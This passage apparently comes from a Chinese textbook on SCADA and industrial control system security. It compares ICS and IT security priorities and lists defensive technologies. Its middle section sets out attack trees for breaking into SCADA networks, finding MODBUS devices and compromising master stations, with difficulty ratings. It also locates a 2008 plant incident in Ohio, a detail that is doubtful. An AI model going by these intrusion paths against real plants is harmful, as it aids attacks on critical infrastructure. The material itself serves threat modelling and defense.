静态分析不实际运行恶意代码,而是通过对恶意代码的二进制文件进行分析 从而提取其特征码。这种特征码可直接被恶意程序扫描引擎用来进行恶意代码的 检测。静态分析的优点是它可以检查恶意代码的所有可能的执行路径,得到的特 征码在检测方面具有较高的准确率。静态分析存在的问题在于工程量较大,反汇 编难度较高,并且反汇编后的可用信息较少,分析周期较长。同时多态(Polymor- phic)、变型、加壳等手段的采用,使得静态分析变得更加困难,很难提取有效的特 征码。静态分析技术一般无需在专用分析系统或者虚拟机上运行恶意代码。 动态分析技术则主要使用黑盒测试法。动态分析需要实际运行恶意代码, 一 般是在受保护的虚拟环境中执行。在恶意代码执行期间分析其动态行为特性,如 对注册表、文件系统、网络的访问情况。这些行为特性的分析可以有效地帮助分析 人员认识和理解恶意代码的危害特性,为恶意代码的清除和检测提供有利的依据。 动态分析的不足在于每次分析,只能检测恶意代码的一条执行路径,有的恶意代码 只有在特定的条件下(如指定的日期)才表现出恶意行为,称为多路径问题。另外 动态分析的结果一般不能直接用于恶意代码的检测。但是由于动态分析注重恶意 代码运行过程中所表现出的行为特性,因此不受多态、加壳的影响,相对静态分析来说具有快速、直观的特点。 3.3 工业 SCADA 系统信息安全与 IP 数据网络信息安全的区别 3.3.1 两种网络的信息安全特点对比 最近几年,工业控制系统的信息安全问题已经成为信息安全界较为活跃的领 域之一。截止目前为止,从学术研究的观点看,限于研究深度和认识水平发展阶段 的原因,国内外尚没有组织、团体和研究人员能够清楚地、令人信服地表达工业控 制系统信息安全与传统的IP 信息安全相比,有什么新的内容,或在理论基础上有 何区别。 本书通过结合前期一些项目研究工作经历及相关研究结论,总结出一些先前 所认识到的工业控制系统信息安全与传统的IP 信息网络安全的区别,并提出工业 控制系统信息安全必须解决的新问题。 1)安全需求不同 在传统IP 数据网络领域中,互联网业务及应用过程最重要的安全需求是机密 性,即确保数据的机密性。但在工业 SCADA 系统,更关键的需求是实时通信或 99.99%的生产控制可用性,在工业控制系统领域,首要的安全需求是可用性。工 业控制系统的受控对象是物理、化学、生物的生产过程,生产受到影响会导致财务、 人员、环境等方面的损失,也会受国家法规约束。工业 SCADA 系统信息安全的重 点是保护受控对象的高度稳定性,其可用性要达到99.9%以上。再次, 一旦发生 信息安全事故,工业控制系统要求必须在很短时间内解决等。 2)安全补丁与升级机制存在的区别 传统IP 数据信息网络安全技术中的常规软件打补丁和经常性的升级机制并 不很适用于工业控制系统。例如,通常升级一套系统、网络或设备需要提前规划如 何使正在运转的工业系统下线或暂停。然而,从能源工业部门的经济利益角度出 发,准确评估出由于停止/暂停工业过程中的控制计算机,使其按照升级规则安装 新的安全补丁,而造成的各种经济损失是件非常困难或几乎不能完成的事情。甚 至一些安全补丁的升级流程可能本质上违反工业控制过程中的流程安全操作规 定。工业控制系统的升级或补丁安装过程也与传统 IP 领域有很大差别,工业生产 控制系统只能接受很短的计划停机时间,有的关键工业控制系统甚至不能停机。 其次,工业控制部门的工作人员作为最终用户,其所掌握的信息安全知识往往是比 较有限的,所以在设计与实施工业控制系统的信息安全防护系统时往往要考虑低 维护率和简单易操作性。 另外,对于传统的IP 计算机数据网络领域来说,已装机系统的更换或升级频率一般是两三年,此外每个年/月/周还可以方便地进行例行补丁安装或修正;而对 于工业控制系统来说,控制系统或设备一旦安装完毕并投入运行,将进行10 ~20 年不间断的可靠运行。 相关国际组织最近解密报道了当时美国俄亥俄州一个核电厂事故真相:2008 年3月7日, 一个核电站工厂意外关闭,原因是该核工厂生产控制网络中一台用于 监视核电站化工原料生产流程和实时诊断数据的计算机,在一次例行软件升级操 作之后重启。而计算机重启后,它重置了整个控制系统的实时数据,导致安全系统 错误地中断了缺失的数据,致使贮水池中的水位骤降,而这个贮水池是用于冷却核 工厂的放射性核燃料棒。 3)实时性方面的差异 另一个被工业界普遍提及的、关于工业控制系统的特殊属性是实时性要求。 工业控制系统是自治决策型系统,要求生产过程控制代理设备实时做出决策。可 用性问题在传统 IP 信息网络安全领域中已经被进行了充分的研究,而实时可用性 问题相比于大多数传统的IP 系统,工业控制系统提出更严格的操作环境限制条 件。目前的实际情况是,那些已经或者即将部署在工业控制系统中的网络安全防 护措施,是否会对工业控制系统的正常运转产生影响,或者如何测量、评估在工业 控制系统中加载信息网络安全机制对实时性可能产生的影响,是工业界和传统 IP 信息网络界都感到很棘手的问题。例如,在电力、石油等能源工业界,事故处理过 程往往发生在毫秒级或更短时间,且控制系统和设备之间的事故责任边界划分非 常明确。当部署信息安全防护机制之后,如何确保事故条件下不耽误正常的处理 流程响应时间,如何界定新装配的信息安全防护系统的事故责任边界,对能源工业 界来说并不容易。 4)安全保护优先级方面的差异 一般情况下,在传统 IP 信息网络系统中,IP 信息安全注重于保护 IP 网络资产 例如服务器、数据库等。而在工业控制系统中,关键资产通常是指各种终端设备, PLC、RTU(远方终端单元)和自动化执行零部件如发动机、变频器等。这些差异可 能造成需要为工业控制系统特别设计安全防护解决方案。 5)安全防护技术适应性方面的差异 大型工业控制系统中通常也需要大量的常规计算机系统,研究人员开展了一 些研究工作,用于提供轻量级的加密机制确保数据的完整性和机密性。最近发布 的 IEEE P1711 标准,就是设计用来为计算机系统的串行链路通信提供安全防护。 然而,大多数为常规计算机系统提供安全防护所付出的努力,在工业控制系统领域 都应该被视为短期解决方案。为正确保护关键工业控制系统,信息安全基础技术 (如密钥管理与分配算法)必须满足最低限度运行的性能需求,已便于那些经过完 善测试后的安全技术机制和标准,得以在工业控制系统中部署。 并不是所有工业控制系统中的操作都比传统 IT 系统复杂,通过与工业企业内的信息系统对比,工业控制系统的网络行为更简单:服务器很少更换,有固定的网 络拓扑,稳定的用户端群体,较为规则的通信模式,数量有限的控制协议类型。因 此,在工业控制系统中实现网络入侵检测系统比传统的企业信息系统也许更加 容易。 3.3.2 工业控制系统信息安全面临的挑战 上面论述的这些区别都是重要的,控制系统相对于其他IT 系统的主要区别是 控制系统与物理世界的相互作用。 总体来说,传统IP 信息网络安全已经发展到较为成熟的技术和设计准则(认证, 访问控制,信息完整性,特权分离等),这些能够帮助我们阻止和响应针对工业控制 系统的攻击。然而,传统意义上讲,计算机信息安全研究关注于信息的保护;研究人 员不会考虑攻击是如何影响评估和控制算法,最终,攻击是如何影响物理世界的。 当前已有的各种信息安全工具,能够对控制系统安全给予必要机制,这些单独 的机制对于深度防护控制是不够的。 通过深入理解控制系统与真实物理世界的交互过程,研究人员在未来需要开 展的工作如下: (1)更好地理解攻击的后果。到目前为止,没有深入研究攻击者获得非授权 访问一些控制网络设备后将造成的危害。 (2)设计全新的攻击检测算法。通过理解物理过程应有的控制行为,并基于 过程控制命令和传感器测量,能够识别攻击者是否试图干扰控制或传感器的数据。 (3)设计新的抗攻击弹性算法和架构。如果检测到一个工业控制系统攻击行 为,能够适时改变控制命令,用于增加控制系统的弹性,减少损失。 (4)设计适合工业 SCADA 系统现场设备的身份认证与密码技术。目前一些 成熟的、复杂的、健壮的密码技术通常不能在工业控制系统的现场设备中完成访问 控制功能,主要原因在于过于复杂的密码机制可能隐藏在紧急情况下妨碍应急处 理程序快速响应的风险。工业自动控制领域的专家一般认为相对较弱的密码机制 (如默认密码、固定密码甚至空口令等),比较容易在紧急情况下进行猜测、传送 等,进而不会对应急处理程序本身产生额外影响。 (5)开发硬件兼容能力更强的工业 SCADA 系统安全防护技术。传统 IT 数据 网络中安全防护能力较强的技术如身份认证、鉴别、加密、入侵检测和访问控制技 术等普遍强调占用更多的网络带宽、处理器性能和内存资源,而这些资源在工业控 制系统设备中十分有限,工业控制设备最初的设计目标是完成特定现场作业任务, 它们一般是低成本、低处理器效能的设备。而且,在石油、供水等能源工业系统控 制装置中仍然在使用一些很陈旧的处理器(如1978年出厂的Intel8088 处理器)。 因此,在这类装置中部署主流的信息安全防护技术而又不显著降低工业现场控制 装置的性能具有一定难度。 工 业 S C A D A 系 统 信 息 安 全 概 述 (6)研制兼容多种操作系统或软件平台的安全防护技术。传统 IT 数据网络 中的信息安全技术机制,主要解决以Windows、Linux、Unix 等通用型操作系统平台 上的信息安全问题。而在工业 SCADA 系统领域,现场工业 SCADA 系统装置一般 使用设备供应商(如 ABB、西门子、霍尼韦尔等)独立研发的、非公开的操作系统 (有时称为固件)、专用软件平台(如 GE 的 iFix等)完成特定的工业过程控制功 能。因此,如何在非通用操作系统及软件平台上开发、部署甚至升级信息安全防护 技术,是工业 SCADA 系统信息安全未来需要重点解决的问题。 3.4 工业 SCADA 系统的信息安全需求 当定义工业 SCADA 系统的安全防护区域或研究、部署信息安全防护技术时, 研究组织或机构必须首先评估明确安全需求(安全目标),然后再确定具体的工业 控制系统资产是应该在安全防护区域内考虑或在外部区域考虑。 工业 SCADA 系统的安全需求可以划分为以下几种类型。 1)接入与访问 对于信息安全边界内可以提供价值的、 一个机构/组织内的资产而言,必然有 来自信息安全边界外部的资产与其相连。这些资产可以有多种形式存在,包括可 流动性物理资产(产品)和人(员工和供应商)或与信息安全区域以外的实体进行 电子信息通信。 远程接入与访问指的是与那些安全区域保护边界之外的资产进行通信。本地 接入与访问通常指一个独立的安全区域内的各种资产间的通信。 2)物理访问与接入 物理安全区域通常用来限制对一些特定区域的接入,因为该区域内的所有系 统需要对其操作人员、维护人员和开发人员拥有相同级别的信任。这并不排除具 有更高级别的物理安全区域嵌入到一个较低级别的物理安全区域内;或者一个更 高级别的通信,接入区域内一个较低级别的物理安全区域。对于物理区域而言,可 以使用给门上锁或其他物理方法防止未经授权的访问,这些边界可以是用于限制 访问的墙或机架等。物理区域必须有与所需的安全水平相称的物理边界,并与其 他资产的安全计划保持一致。 物理安全区域的一个例子是一个典型的工业设备制造厂,被授权的人可以通 过授权代理进厂(安全卡或身份卡)。未经授权的人被限制进入使用相同的授权 代理及由电子围栏保护的区域。 信息安全边界内的资产是那些必须受到给定的安全级别或策略保护的资产。 信息安全边界内的所有设备必须共享相同的、最低级别的安全性要求。另一方面, 信息安全边界内的所有设备必须受到严格的保护,并满足相同的安全策略要求。 不同的资产需要不同的保护机制进行保护。 信息安全区域之外的资产,理论上需要更低级别或者不同的安全防护水平。 这些资产并不需要与区域内的资产相同的安全保护机制,而且,根据定义不能被相 同的信息安全水平或策略信任。 另一方面,从企业管理与工程建设角度,并结合第6章讨论的内容,工业控制 系统信息安全需求包括: (1)开展重点能源企业内部工业控制系统信息安全风险评估,建设全面的信 息安全管理机制。 (2)实现安全域的划分与隔离,网络接口遵从清晰的安全规范。 (3)部署集成安全措施的保护基于PC 的控制系统。 (4)保护工业控制系统控制级,防御安全攻击。 (5)实现对工业控制系统通信的可感知与可控制。 3.5 工业 SCADA 系统的信息安全目标 传统信息安全研究领域主要关注三方面的信息安全目标:机密性、完整性和可 用性,简称 CIA。传统 IP 数据网络的信息安全管理技术通常认为机密性的优先级 最高,并总是积极配置相应的访问控制技术实现机密性;完整性排在次要位置,可 用性的优先级则最低。 然而在工业自动化和控制系统环境条件下,信息安全目标却完全不同。工业 SCADA 系统强调的是工业生产自动化过程及相关设备、流程以及工艺的智能控 制、监测与管理。它们在系统架构、设备操作系统、数据交换协议、承载业务内容等 方面与普通IT 信息数据网络系统存在较大差异,而且更为关注系统的实时性与生 产控制业务连续性。换句话说,工业 SCADA 系统对生产控制系统设备的可用性、 实时性、可控性、可靠性等特性要求很高,着重强调的是工业过程的连续作业能力, 因此在考虑工业 SCADA 系统信息安全时必须优先保证控制系统的可用性。另 外,因工业 SCADA 系统设备或系统各组件之间存在固有的内在关联性,因此完整 性次之。而对于数据保密性来说,则由于工业 SCADA 系统中传输的数据通常是 控制命令和采集的原始现场工况数据,需要放在特定的背景下分析才有意义,而且 多是实时数据,因此对保密性的要求最低,如表3.1所示。 表3.1 传统 IT 信息系统和工业 SCADA 系统安全目标优先级区别 优先级 传统IT信息网络 SCADA/ICS 1 机密性 可用性 2 完整性 完整性 3 可用性 机密性 同时,这也就是在研究工业 SCADA 系统安全时,需要注意的与考虑传统 IT 信息数据网络信息安全的原则性差异。 3.6 工业 SCADA 系统攻击树理论 图3.3所示是一个具有代表性的、用来开展学术研究的攻击树的例子,在每个 树分枝节点后面标识了实施过程中的难度系数。该攻击树的完整的学术研究版本 已由美国国家信息基础设施信息安全合作研究中心(NISCC) 在2005年出版发行。 图3 . 3 攻击目标的相互关联和近似程度 1)攻击目标1:进入SCADA 系统 当进行一个赛博攻击时,首先需要的是得到各种途径进入目标系统。此时最 显著的方法是进入不信任的网络,当然这不是唯一的攻击点。接下来的树描述了 进入SCADA 系统和PCN 系统的各种方法。 Attack:进入SCADA 系统(难度系数:2) OR 1. 物理接入远方的设备。(2) 2. 接入SCADA 媒体线路。(2) OR 2.1 在建筑物外拦截线路。(2) 2.2在公共基础上拦截线路。(3) 2.3 拦截无线线路。(3) 3. 进入当地 PCN 网络。(2) OR 3.1 物理接入PCN 中的设备。(3) 3.2拨号进入PCN中的设备。(2) 3.3无线接入 PCN 中的设备。(2) 4. 通过网络远程访问PCN 。(3) AND 4.1 通过网络访问IT 网络。(3) OR 4.1.1 物理接入IT 网络。(3) 4.1.2远程接入IT 网络。(3) 4 . 2在IT 和 PCN 间建立连接。(3) 5. 通过第三方进行接入。(2) AND 5.1 进入第三方信任的网络。(2) OR 5.1.1 物理接入第三方网络。(3) 5.1.2远程接入第三方网络。(2) 5.2在第三方网络与 PCN 之间建立连接。(2) 6. 通过不信任的远程访问。(3) AND 6.1 在网络与内部 IT 网络建立连接。(3) 6 . 2在IT 网络与 PCN 之间建立连接。(2) 通过遵循最短路径,可以看出最成功的攻击不是通过网络进行攻击,而是通过 对远方的站点进行物理接入,或者接入SCADA 通信介质。同时通过拨号接入和 无线直接接入PCN 网络也是可能的。攻击是否能够利用这些方法取决于其攻击 的目标。 2)攻击目标2:确定MODBUS 设备 当达到进入SCADA 系统的任务后,下一步的要求就是确定具有脆弱性的设 备。这是假设在对多数系统进行隐蔽的侦查的前提下的,通过确定 MODBUS 设 备,攻击者可以朝着目标更进一步。研究团队建立了如下的攻击树用来在 SCADA 系统中确定 MODBUS 设备,同样标注了技术手段和非技术手段。 Attack: 确定 RTU 设备(难度:2) OR 1. 社会工程学(假装为PLC 维护工程师)。(2) 2.TCP/UDP 端口扫描(502端口)。(2) AND 2.1 进入当地 PCN 网络。(2) 2 . 2部署 TCP/UDP 扫描工具。(1) 3.MODBUS 消息扫描(仅对从有效)。(2) AND 3.1 进入远方站点,或者 SCADA 通信系统。(2) 3.2部署 MODBUS 消息扫描工具。(2) 4. 管理/应用协议扫描。(2) AND 4.1 进入当地 PCN 网络。(2) 4.2部署工具。(2) OR 4.2.1扫描 HTTP/SNMP/TELNET端口来确定。(2) 4.2.2扫描其他可以确定的端口。(2) 5. 刺探存在的MODBUS 会话。(2) OR 5.1 通过与主冲突进行嗅探。(2) AND 5.1.1 与主服务器进行冲突(目标#11)。(2) 5.1.2 安装抓包软件。(2) 5.2通过截断 SCADA 媒介进行嗅探。(2) AND 5.2.1接入SCADA 网络。(2) 5.2.2安装协议抓包工具。(1) 这些分析说明一旦攻击者成功地进行接入,确定现场终端单元(RTU) 设备不 是一件很困难的事情。根据接入方式的不同,可以通过简单的扫描RTU 设备或者 通过特殊的数据结构来寻找 RTU 设备。不管怎么说,简单的防渗透系统将增加攻 击者的难度,迫使他们将目标转向其他的目标。但是部署这些系统是不太现实的, 因为在 SCADA 系统安装这些系统都不可能对正常的操作不产生影响。 3)攻击目标3:损坏 SCADA 系统主设备 损坏工业 SCADA 系统主设备是我们目前能够想到的破坏性最强的攻击手 段。他提供了执行其他攻击手段的基础,同时取得可信任的连接。这就提供了攻 击者对系统造成破坏的能力。这个攻击目标是在所有的攻击目标中最引人注目 的,不管攻击者的目标是窃取信息,瘫痪SCADA 系统或者攻击其他的设备。 Attack: 损坏主设备(难度:2) OR 1. 对主设备物理攻击。(3) AND 1.1 物理接入主设备。(3) 1.2破解管理员密码。(2) 2. 对主设备网络攻击。(2) 2.1 进入主设备网络。(2) OR 2.1.1 损坏主设备系统。(2) 2.1.2破坏主设备上主要程序。(3) 2.1.3 破坏主设备上的其他程序。(2) 2.2使用从设备破坏主设备。(3) OR 2.2.1 物理接入从设备。(2) AND 2.2.1.1 使真正的从设备停止工作。(1) 2.2.1.2构造混乱的从设备回复到主设备。(2) 2.2.1.3 使主设备发生错误通过非法格式的从设备响应。(3) 2.2.1.4将程序加载到主设备。(3) 2.2.2接入SCADA 传输媒介。(2) AND 2.2.2.1 使真正的从设备停止工作。(2) 2.2.2.2构造混乱的从设备回复到主设备。(2) 2.2.2.3 使主设备发生错误通过非法格式的从设备响应。(3) 2.2.2.4将程序加载到主设备。(3) 经过上面的分析,我们可以发现两个截然不同的路径进行攻击。假如已经接 入 PCN 网络,主设备可以被破坏通过其自身的操作系统或者嵌入式 HTTP服务器 等类似软件。假如是通过一个进入SCADA 系统传输介质或者进入一个从设备, 那么就会比较困难,但是也可能去破坏一个主设备。所有有效的破坏方式都基于 主设备技术上的脆弱性。不管是基于Windows 还是基于Unix 的主设备,这些技术 上的漏洞都可以轻易地通过黑客团体得到和在大多数 SCADA 的环境中曝光。 4)实验验证 通过构造的攻击树,研究团队在实验室的设备上测试了各种攻击方法的可行 性。第一(也许是最不幸的),攻击树可以显著地提高其实验室成员发现新的工业 SCADA 漏洞的能力。举例: 一个研究成员成功地创造出一个原始的对知名 PLC 进 行 DOS 攻击的病毒软件。另外一个例子是在一个知名的能源公司验证了“破坏主 设备”的路径。 在另一方面,攻击树在阻断攻击方面是同样有效的。例如,鉴别正常的企业网 络连接外的网络连接的安全性,在 SCADA 的攻击树中是很重要的。尽管一个细 节不受限制的攻击树对于一个可能的攻击者来说是一个指南,但如果管理得当,攻 击树可以帮助 SCADA 的管理者来决定有效的安全手段。 5)攻击树方法总结与建议 在表3.2中已经对每个攻击树进行总结分析,展示出11种可能的攻击目标、 各自的技术难度、安全性可能的影响。它还列出了协议的脆弱性可能导致的攻击。 通过对每个攻击树进行分析得到所有可能的攻击都基于攻击者可以得到进行网络 的权限和鉴别出存在的 MODBUS 和 MODBUS/TCP 设备。如果有足够的安全措 施,用来阻止进入SCADA 系统所有的入侵点,那么将在很大程度上减少攻击成功 的概率。 表3.2 攻击树总结 攻击目标 难度 影响程度 察觉度 依赖的脆弱性 备注 进入SCADA系统 1~3 很低 低 (1)无线网络; (2)第三方接口; (3)远程站点; (4)SCADA传播媒体 (1)对于所有攻击 手段首先必须实现; (2)困难程度由接 人点和安全措施来 决定 确 定 M O D B U S 设备 2 很低 低 缺乏保密性 实现下面的攻击 必经的步骤 扰乱通信 2 适中 高 (1)缺乏认证; (2)缺乏会话结构; (3)框架过于简单 破坏从设备 3 适中 高 (1)缺乏认证; (2)缺乏会话结构; (3)框架过于简单 读 取 从 设 备 数据 2 适中 很低 (1)缺乏保密; (2)缺乏认证 写 人 从 设 备 数据 2 高 很低 (1)缺乏认证; (2)缺乏会话结构; (3)缺乏完整性 从设备再编程 2 高 低 (1)可能缺乏认证; (2)缺乏会话结构; (3)缺乏完整性 扰乱从设备 3 很高 低 (1)可能缺乏认证; (2)缺乏完整性 ( 续 ) 攻击目标 难度 影响程度 察觉度 依赖的脆弱性 备注 瘫痪主设备 2 适中 高 (1)缺乏认证; (2)缺乏会话结构 向主设备写入 数据 3 高 低 (1)缺乏认证; (2)缺乏会话结构 扰乱主设备 2 最高 低 (1)缺乏认证; (2)缺乏会话结构 相比其他攻击目 标而言其意义非常 重要 不幸的是,大多数情况下公众研究对工业 SCADA 系统的攻击,注意力主要集 中在通过互联网的攻击或者业务系统的攻击,并没有关注公开攻击其他的点,例如 远方的监测点、可信任的第三方网络和无线控制网络。通过分析 SCADA 系统的 事故,证明了这是存在的事实。这些攻击树说明一旦攻击者成功地进入SCADA 系统,任何中等技术的黑客都可以展开大多数攻击。 6)攻击树理论在攻击威胁建模方面的应用 在过去的几年中信息技术得到指数级的增长,大量关于通用的网络系统的漏 洞被报道出来。例如,在CERT 的报告《Vulnerabilities Reported 1995—2002》中提 到,赛博脆弱性从1998年的不足300个,在短短的4年后就增长到超过4000个。 脆弱性势如破竹的增长对于安全来说变成一个主要的挑战,将面对不仅仅是日益 增长的攻击数目,还有这些攻击是怎样变得如此复杂的。这时需要一个方法来组 织这些攻击的可能性,梳理他们内在的关系,以及进行分析。 攻击树技术最初由 Bruce Schneier 等进行描述,该技术提供了灵活的结构化分 析协议、应用程序以及网络。尽管由Dr Dobb's Journal 在1999年提出的缺陷树技 术已经在很长时间里被用来进行系统分析。紧接着“CERTC/CC” 为此技术、标准 符号开发出一个更加正规的应用,并且提供了更多复杂的用例。第一次关于攻击 树的应用于网络协议被公布是在《An Attack Tree for the Border Gateway Protocol》, 目前正在应用于IETF 路由协议的安全研究工作。 根据这些方法,美国一个 SCADA 系统信息安全研究团队使用攻击树技术来 支持对用MODBUS/TCP 进行开发的设备进行脆弱性测试,以期能够找出对 SCA- DA 系统产生巨大破坏的漏洞。使用攻击树最显著的优点是:他将分析过程集中 到可度量的目标上,使得最终这些研究成果可以转换成对真实设备、网络、协议实 现的测试。这将帮助避免落入过于学术化的研究(通常对不同攻击行为的考虑欠 佳,难以评估对目标系统的实际影响)。 攻击树同样精心构造出一系列在一次成功的入侵时一定会发生的事件。这将 有助于对所有攻击支持可能采取的措施进行考虑,并且减轻了筛选最佳部署对策的负担。进一步说,自从每个节点可以被分解为子节点以来,攻击树可以将安全分 析抽象成多层架构,这样研究人员可以集中精力在自己感兴趣的层次。最后,攻击 树允许将网络通用的攻击脚本作为通用模块来使用。 证明这个结论最有效的方式是用示例证明,正如 Schneier 在他最初的论文中 提及的一样。 一个人试图在未经过认证的前提下进入建筑物。攻击树如下: 目的:未经认证进入建筑物 Attack: OR 用钥匙开门 撬锁 破 窗 跟随有权限的个体进入 这个简单的树应该这样解读:在未经授权的前提下进入建筑物面临的问题是, 必须用钥匙开门、撬锁、破窗或者跟随有权限的人进入。这个“OR” 的运算符代表 只需要一个条件。在同样的条件下“AND” 意味着为达成父节点的目标子节点的 条件必须全部满足。攻击树在这种情况下展示的细节是有限制的使用,他们真实 的含义是对手是怎样执行下列的子目标的。这就要求如下更加详细的攻击树: 目的:未经认证进入建筑物 Attack: OR 1. 用钥匙开门 OR 1.1 偷钥匙 1.2社会工程学 OR 1.2.1 借钥匙 1.2.2喊锁匠来开锁 2. 撬锁 3. 破窗 4. 跟随有权限的个体进入 AND 4.1 穿上合适的衣服 OR 4.2.1 表现的像跟着某人 4.2.2 在外面和某人搞好关系 4.2.3 表现的像需要帮助(扛个大箱子) 现在不同的子节点的树更好定义。以“开锁”为例,您需要偷钥匙,或执行某 种类型的社会工程。子目标4说明了如何使用“OR” 和 “AND” 在同一水平的树。 这应被理解为如下:为了跟随某人进入建筑物需要穿合适的服装和执行下面3个 项目中的一项。 使用攻击树还可以比较技术性和非技术性的攻击,支持更全面的威胁分析和 漏洞研究。即使没有广泛的描述,通过对攻击树的学习,我们将知道跟随某人进入 建筑是代价和风险最低的方法。 对具体协议的分析是一个相对较新的研究方向。到目前为止,边界网关路由 协议(BGP) 最受ITEF 的 Murphy 和 Convery 提出的 RFC 关注。RFC 使用攻击树描 述可能存在的漏洞,但目前尚未指定任何风险或难度值的树的子节点。 完成这项研究后,团队意识到由美国政府研究机构的一些关于MODBUS 脆弱 性未发表的研究,关于如何使用攻击树的分析,可能成为 SCADA 系统攻击脚本, 有可能涉及法律问题。因此,该研究团队没有发表任何深入尝试分析工业 SCADA 协议漏洞的结论,其研究方法仅供参考。 第4 章 工业SCADA 系统信息安全关 键技术 4.1 工业 SCADA 系统信息安全基础技术 工业 SCADA 系统信息安全内涵、需求和目标特性,决定了需要一些特殊的信 息安全技术、措施,在工业生产过程中的IED、PLC、RTU、控制器、通信处理机、SCA- DA 系统和各种实际的、各种类型的可编程数字化设备中使用或配置,达到保障工 业 SCADA 系统生产、控制与管理的安全功能目标[13]。所有自动控制系统信息安 全的基础技术是访问控制和用户身份认证,在此基础上发展了一些通过探针、信道 加密、数据包核查和认证等手段保护通信数据报文安全的技术。表4.1列举了一 些确保工业 SCADA 系统信息安全的基础技术,该表以部署技术的成本或复杂度 进行组织排序。 表4.1 工业 SCADA 系统信息安全基础技术 序号 信息安全技术 功能 升级维护情况 用户友好程度 1 基于工业现场设 备/装置的passwords 或PIN码 访问控制 通过用户自定义的 编程方式实现 很方便地使用或二 次编程开发 2 随机密翎发生器 由软件产生健壮的 密钥 通过用户自定义的 编程方式实现 使用方便,但不支持 二次编程开发 3 审计日志 记录设备或系统的 登录访问情况 通过系统自带程序 或用户编程实现 使用方便,但不支持 二次编程开发 4 具有身份认证功 能的工业设备/装置 硬件级认证 通过服务器证书或 主机平台开发实现 使用方便,但不支持 二次编程开发 5 生物特征因子 提供强壮的单因素 ID,或双因素ID 通过用户主机进行 编程 使用方便,但不支 持二次编程开发 ( 续 ) 序号 信息安全技术 功能 升级维护情况 用户友好程度 6 调制解调器专用 (Modem )的 key 或锁 确保安全的modem 连接 每个锁装置可配置 任意数目、并且用户可 选的key 二次编程开发和使 用都很方便 7 安全调制解调器 (modems) (1)可编程型安全调制 解调器 ; ( 2 ) 加 密 型 调 制 解 调 器 ; (1)使用可编程用户账 号确认每一个呼叫; (2)使用基于握手的安 全机制,但必须成 对使用 ; 使用很方便,但二次 编程方面很困难 8 虚 拟 专 用 网 (VPN)设备 提供硬件级的信息 安全能力 必须成对使用 使用和二次编程 开发都不太方便 9 防火墙 (1)软件防火墙 (2)硬件防火墙 使用和二次编程 开发都不太方便 10 入侵检测系统(IDS) 系统异常或入侵指 纹探测 极少数可以升级 使用和二次编程 开发都不太方便 11 公翎基础设施(PKI) 鉴别认证和安全网 络通信连接 自身支持可升级 使用和二次编程 开发都不太方便 通过上述基础技术构建了工业 SCADA 系统信息安全事前、事中和事后的全 面管理、整体安全的防护技术体系。 1)事前防御技术 事前防御技术是工业 SCADA 系统信息安全防护技术体系中较为重要的部 分,目前有很多成熟的基础技术可以利用。 (1)访问控制/防火墙。包含了物理层面和电子层面。物理访问限制技术是 很常见的,不在本书讨论范畴之内。电子访问限制技术是通过将密码或个人识别 号(PIN) 添加到系统、个人电脑、数字设备、数据库和数据库报告中,然后对访问者 的密码和PIN 进行对比,验证访问者的合法性。如果在密码或 PIN 和用户之间存 在一对多的映射关系,那么即使大量的用户具有相同的密码或 PIN, 还是实现了一 套简单的访问限制技术[4]。 防火墙是位于需要被保护的网络和“外部”之间的具有保护功能的网关。通 过安置在一些网络边界处,用于防护来自外部网络的入侵行为。防火墙通过输入 访问限制和隔绝等技术分割网络。通过设立网络断层、受限制的子网络,即使黑客 入侵了某层网络,他也仅仅能够获取或修改该段网络的数据和系统。可以通过剔 除不期望的传输或者通过硬件和软件复杂的融合来实现防火墙技术。 为了保证有效性,防火墙必须监测所有访问内部网络的连接,包括调制解调器 的连接和偏远网络访问。Internet 协议安全性和虚拟局域网(VPN) 提供了不同隔离网络之间的安全信息传输协议和技术。IPSec 利用加密技术维护数据和将验证 信息报文插入到 TCP/IP 报文中。 (2)身份认证。主要是用于当通信双方是处于一对一映射关系时,例如,为了 获得权限访问系统、设备、数据库或者数据记录,输入一组独有的密码和 PIN, 从而 能够令安全系统识别出用户的合法性。用户认证机制包括3个因素:知识因素、物 理因素和生物因素。密码和 PIN 利用智能卡片满足第一个因素;同样的,利用类似 的设备满足第二个因素;利用指纹或者其他的生物特性满足第三个因素。 用户认证是属于大量认证方法和策略的因素之一。多年来,人们认为单一因 素的认证对于网络系统是“合适的”,但是,随着电子商务的快速发展和电子偷窃 行为的增加,现在,许多系统采用了双因素认证,甚至是三因素认证。双因素认证 需要通过不同的两个因素确定用户的合法性,而三因素认证就需要考虑到所有的 因素。双因素认证在电子商务中应用广泛(例如信用卡和 PIN), 而三因素认证通 常应用于军事和私人系统(例如密码、智能卡片和指纹)。 (3)ID 设备。 一种电磁装置,它主要提供关于物理向量的认证信息。例如, 信用借贷卡、智能卡片、磁条、条形码和嵌入式ID 码都是ID 电磁设备。利用ID 设 备去判断用户的密码和PIN 最主要的优势是通过随机关键条码自动认证只有在新 的关键条码生成前很短的时间内有效。“一次性”关键条码是呈周期性改变的。 局限于其有效时间,它在经过长距离长时间传输以后便失去了有效性,因此,即使 关键条码在网络传输的过程中被某人监听,监听者也不能在以后的时间内使用它。 (4)生物鉴定学。生物鉴定学是符合第三方认证因素的认证方法或机制。指 纹识别是目前应用最广泛的生物鉴定技术。指纹识别设备包括其创建和维护用户 指纹的数据库软件系统。视网膜识别、声音特征、脸部识别系统和其他生物学的测 量技术均大量应用于多因子识别机制里。但是,花费和技术复杂性是限制这些技 术发展的主要原因。 (5)安全的调制解调器。带来了安全问题的多样化技术解决途径。最简单的 调制解调器的安全策略是钥匙\锁两者的合并,它们成对地工作来保证所有的通信 均被调制解调器的配置对统一管理。在建立连接的过程中,通过键入通信双方的 握手过程,保证最终建立的连接是一个安全的、认证后的连接;为了保证高速调制 解调器通信的数据压缩要求,通信数据一般是没有被加密的。调制解调器进一步 发展便是可编程的调制解调器,该调制解调器能够自己加载安全策略,例如授权用 户自定义账目,包括分配口令和拨出电话号码等。但是,再一次,安全策略仅仅限 制在保证通信双方连接的认证上面,而对信息包并没有加密。最后,安全的加密的 调制解调器最近在被国内外深入的研究,类似于可编程调制解调器,密钥也是通用 在通信双方之间的。加密的调制解调器采用了安全认证技术和安全加密技术,从 而避免了入侵者在公用网络路线的偷听行为的发生。 (6)加密技术。是确保通信数据包从源点向目的点传输的过程中信息的安全性,通过加密技术,第三方监听者将不能获取数据包的具体内容。通过电话或网络 传输未加密的数据信息包时,极容易在不同的地方被电话探测器和网络嗅探器捕 获,从而造成不必要的损失。例如, 一个未经加密的TCP/IP 或 UCA 包对于在网络 